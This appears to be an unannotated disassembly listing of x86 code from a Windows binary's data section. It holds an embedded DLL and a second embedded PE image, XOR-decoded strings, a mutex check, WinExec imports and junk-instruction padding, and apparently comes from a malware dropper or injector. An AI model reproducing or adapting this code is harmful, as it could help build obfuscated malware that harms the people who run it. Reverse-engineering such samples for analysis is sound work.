mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43C675: ; CODE XREF: .data:0043C70E�j
cmp esi, 0FFFFFFFFh
jz loc_43C726
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43C705
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43C705
js short loc_43C713
mov edi, [ebx+8]
push ebx
call sub_43C622
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43C5C8
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43C705: ; CODE XREF: .data:0043C686�j
; .data:0043C6DB�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43C675
; ---------------------------------------------------------------------------
loc_43C713: ; CODE XREF: .data:0043C6DD�j
xor eax, eax
jmp short loc_43C730
; ---------------------------------------------------------------------------
loc_43C717: ; CODE XREF: .data:0043C65A�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43C5C8
add esp, 0Ch
loc_43C726: ; CODE XREF: .data:0043C678�j
push 0Bh
call sub_43CD28
add esp, 4
loc_43C730: ; CODE XREF: .data:0043C715�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43C749
call sub_43C76C
loc_43C749: ; CODE XREF: .data:0043C742�j
call sub_43CC1B
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C76C proc near ; CODE XREF: .data:0043C744�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43CCE0
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43CCE0
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43CCE0
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43CCD4
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43CCD4
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43CCD4
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43C7E5
push 0
push edi
call sub_43CD34
add esp, 8
loc_43C7E5: ; CODE XREF: sub_43C76C+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43C7FF
push 0
push edi
call sub_43CD34
add esp, 8
call sub_43C804
loc_43C7FF: ; CODE XREF: sub_43C76C+81�j
pop edi
leave
retn
sub_43C76C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C804 proc near ; CODE XREF: sub_43C76C+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43CC50
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43C841
; ---------------------------------------------------------------------------
loc_43C820: ; CODE XREF: sub_43C804+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43C82D
inc [ebp+var_C]
loc_43C82D: ; CODE XREF: sub_43C804+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43C841: ; CODE XREF: sub_43C804+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43C820
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43CD04
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43C874
xor eax, eax
jmp short loc_43C8EA
; ---------------------------------------------------------------------------
loc_43C874: ; CODE XREF: sub_43C804+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43C8CD
; ---------------------------------------------------------------------------
loc_43C879: ; CODE XREF: sub_43C804+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43C8C7
push [ebp+var_4]
call sub_43CD04
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43C8B0
jmp short loc_43C8EA
; ---------------------------------------------------------------------------
loc_43C8B0: ; CODE XREF: sub_43C804+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43CD58
add esp, 8
add [ebp+var_8], 4
loc_43C8C7: ; CODE XREF: sub_43C804+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43C8CD: ; CODE XREF: sub_43C804+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43C879
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43C8EA: ; CODE XREF: sub_43C804+6E�j
; sub_43C804+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C804 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C8F0 proc near ; CODE XREF: sub_43C99A+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43CD10
add esp, 0Ch
xor edi, edi
jmp short loc_43C939
; ---------------------------------------------------------------------------
loc_43C91F: ; CODE XREF: sub_43C8F0+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43C939: ; CODE XREF: sub_43C8F0+2D�j
cmp edi, esi
jl short loc_43C91F
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43C989
and dword ptr ds:10004098h, 0
loc_43C989: ; CODE XREF: sub_43C8F0+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43C8F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C99A proc near ; CODE XREF: .data:0043CB33�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43CC8C
push 5
push 100040BDh
call sub_43C8F0
add esp, 8
push eax
push 0
push 1F0001h
call sub_43CCB0
mov [ebp+var_4], eax
or eax, eax
jz short loc_43C9F5
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43CC68
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43C9F5: ; CODE XREF: sub_43C99A+3C�j
pop edi
pop esi
leave
retn
sub_43C99A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C9F9 proc near ; CODE XREF: .data:0043CB67�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43CC44
call sub_43CC74
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43CA17: ; CODE XREF: sub_43C9F9+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43CA17
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43CA4C
; ---------------------------------------------------------------------------
loc_43CA2E: ; CODE XREF: sub_43C9F9+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43CA48
call sub_43CC38
inc [ebp+var_2]
call sub_43CC8C
jmp short loc_43CA54
; ---------------------------------------------------------------------------
loc_43CA48: ; CODE XREF: sub_43C9F9+3D�j
dec [ebp+var_2]
loc_43CA4C: ; CODE XREF: sub_43C9F9+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43CA2E
loc_43CA54: ; CODE XREF: sub_43C9F9+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43CA92
mov [ebp+var_4], 0
jmp short loc_43CA80
; ---------------------------------------------------------------------------
loc_43CA66: ; CODE XREF: sub_43C9F9+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43CA80: ; CODE XREF: sub_43C9F9+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43CA66
loc_43CA92: ; CODE XREF: sub_43C9F9+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43CCA4
call sub_43CC98
pop edi
pop esi
pop ebx
leave
retn
sub_43C9F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CAB3 proc near ; CODE XREF: .data:0043CBBA�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43CC44
push 100040BBh
push [ebp+arg_0]
call sub_43CD4C
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43CAB3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43CD40
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43C99A
add esp, 10h
or eax, eax
jz short loc_43CB47
xor eax, eax
inc eax
jmp loc_43CBF0
; ---------------------------------------------------------------------------
loc_43CB47: ; CODE XREF: .data:0043CB3D�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43CC5C
call sub_43CC44
lea eax, [ebp-205h]
push eax
call sub_43C9F9
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43CC80
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43CC44
call sub_43CC38
lea eax, [ebp-0FFh]
push eax
call sub_43CAB3
call sub_43CC8C
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43CD4C
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43CCC8
call sub_43CC74
xor eax, eax
inc eax
loc_43CBF0: ; CODE XREF: .data:0043CB42�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CC1B
loc_43CC0A: ; CODE XREF: sub_43CC1B+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43CC1B
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_43CC1B proc near ; CODE XREF: .data:loc_43C749�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CC0A SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43CC0A
sub_43CC1B endp
; ---------------------------------------------------------------------------
align 4
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC38 proc near ; CODE XREF: sub_43C9F9+3F�p
; .data:0043CBAE�p
jmp dword ptr ds:100050ECh
sub_43CC38 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC44 proc near ; CODE XREF: sub_43C9F9+F�p
; sub_43CAB3+7�p ...
jmp dword ptr ds:100050F0h
sub_43CC44 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC50 proc near ; CODE XREF: sub_43C804+10�p
jmp dword ptr ds:100050F4h
sub_43CC50 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC5C proc near ; CODE XREF: .data:0043CB56�p
jmp dword ptr ds:100050F8h
sub_43CC5C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC68 proc near ; CODE XREF: sub_43C99A+49�p
jmp dword ptr ds:100050FCh
sub_43CC68 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC74 proc near ; CODE XREF: sub_43C9F9+14�p
; .data:0043CBE8�p
jmp dword ptr ds:10005100h
sub_43CC74 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC80 proc near ; CODE XREF: .data:0043CB99�p
jmp dword ptr ds:10005104h
sub_43CC80 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC8C proc near ; CODE XREF: sub_43C99A+16�p
; sub_43C9F9+48�p ...
jmp dword ptr ds:10005108h
sub_43CC8C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC98 proc near ; CODE XREF: sub_43C9F9+B0�p
jmp dword ptr ds:1000510Ch
sub_43CC98 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCA4 proc near ; CODE XREF: sub_43C9F9+AB�p
jmp dword ptr ds:10005110h
sub_43CCA4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCB0 proc near ; CODE XREF: sub_43C99A+32�p
jmp dword ptr ds:10005114h
sub_43CCB0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCBC proc near ; CODE XREF: sub_43C622+13�p
jmp dword ptr ds:10005118h
sub_43CCBC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCC8 proc near ; CODE XREF: .data:0043CBE3�p
jmp dword ptr ds:1000511Ch
sub_43CCC8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCD4 proc near ; CODE XREF: sub_43C76C+33�p
; sub_43C76C+45�p ...
jmp dword ptr ds:10005128h
sub_43CCD4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCE0 proc near ; CODE XREF: sub_43C76C+B�p
; sub_43C76C+17�p ...
jmp dword ptr ds:1000512Ch
sub_43CCE0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD04 proc near ; CODE XREF: sub_43C804+58�p
; sub_43C804+96�p
jmp dword ptr ds:10005138h
sub_43CD04 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD10 proc near ; CODE XREF: sub_43C8F0+23�p
jmp dword ptr ds:1000513Ch
sub_43CD10 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD28 proc near ; CODE XREF: .data:0043C728�p
jmp dword ptr ds:10005144h
sub_43CD28 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD34 proc near ; CODE XREF: sub_43C76C+71�p
; sub_43C76C+86�p
jmp dword ptr ds:10005148h
sub_43CD34 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD40 proc near ; CODE XREF: .data:0043CB01�p
jmp dword ptr ds:1000514Ch
sub_43CD40 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD4C proc near ; CODE XREF: sub_43CAB3+14�p
; .data:0043CBD2�p
jmp dword ptr ds:10005150h
sub_43CD4C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD58 proc near ; CODE XREF: sub_43C804+B7�p
jmp dword ptr ds:10005154h
sub_43CD58 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aJembijfp db 'Jembijfp',0 ; DATA XREF: sub_403C5F+2C0�o
aJklmno db 'jklmno',0
aAy db 'Ay&',0
db '\',0
aTtii db '',0
align 4
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
align 10h
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB db 0Ah
db '|B',0
align 4
aP_0 db '(p',0
align 4
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_43DBA9 db 4Dh, 5Ah, 90h ; DATA XREF: sub_403AA3+10B�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_43DFC9 proc near ; CODE XREF: .data:0043E101�p
; .data:0043E12F�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_43DFE6: ; CODE XREF: sub_43DFC9+44�j
; sub_43DFC9+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43E015
cmp esi, [esp+1Ch+arg_4]
jz short loc_43E015
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43DFE6
call dword ptr [ebx+esi*4+8]
jmp short loc_43DFE6
; ---------------------------------------------------------------------------
loc_43E015: ; CODE XREF: sub_43DFC9+2A�j
; sub_43DFC9+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43DFC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E023 proc near ; CODE XREF: .data:0043E0F4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_43F761
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43E023 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_40408C, eax
mov dword ptr ds:loc_40408F+1, ebx
test dword ptr [eax+4], 6
jnz loc_43E128
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr ds:loc_40408F+1, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43E086: ; CODE XREF: .data:0043E11F�j
cmp esi, 0FFFFFFFFh
jz loc_43E137
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43E116
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_40402E+2, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404034, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404034+4, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_404034+8
mov esi, dword ptr ds:loc_404034
rep movsd
lea edi, loc_404034+8
mov dword ptr ds:loc_404034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43E116
js short loc_43E124
mov edi, [ebx+8]
push ebx
call sub_43E023
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43DFC9
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43E116: ; CODE XREF: .data:0043E097�j
; .data:0043E0EC�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43E086
; ---------------------------------------------------------------------------
loc_43E124: ; CODE XREF: .data:0043E0EE�j
xor eax, eax
jmp short loc_43E199
; ---------------------------------------------------------------------------
loc_43E128: ; CODE XREF: .data:0043E066�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43DFC9
add esp, 0Ch
loc_43E137: ; CODE XREF: .data:0043E089�j
push 0
mov dword ptr ds:loc_404010, 0Bh
push 0Bh
call sub_43F905
add esp, 8
or eax, eax
jnz short loc_43E172
push 0
mov dword ptr ds:loc_404010, 8
push 8
call sub_43F905
add esp, 8
or eax, eax
jnz short loc_43E172
mov eax, 1
jmp short loc_43E199
; ---------------------------------------------------------------------------
loc_43E172: ; CODE XREF: .data:0043E14F�j
; .data:0043E169�j
cmp eax, 0FFFFFFFFh
jz short loc_43E1A1
push eax
push dword ptr ds:loc_404010
call sub_43F905
add esp, 8
push dword ptr ds:loc_404010
call sub_43F8ED
add esp, 4
mov eax, 1
loc_43E199: ; CODE XREF: .data:0043E126�j
; .data:0043E170�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43E1A1: ; CODE XREF: .data:0043E175�j
cmp dword ptr ds:loc_404029+3, 0
jnz short loc_43E1B1
mov eax, 1
jmp short loc_43E199
; ---------------------------------------------------------------------------
loc_43E1B1: ; CODE XREF: .data:0043E1A8�j
mov eax, dword ptr ds:loc_404029+3
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
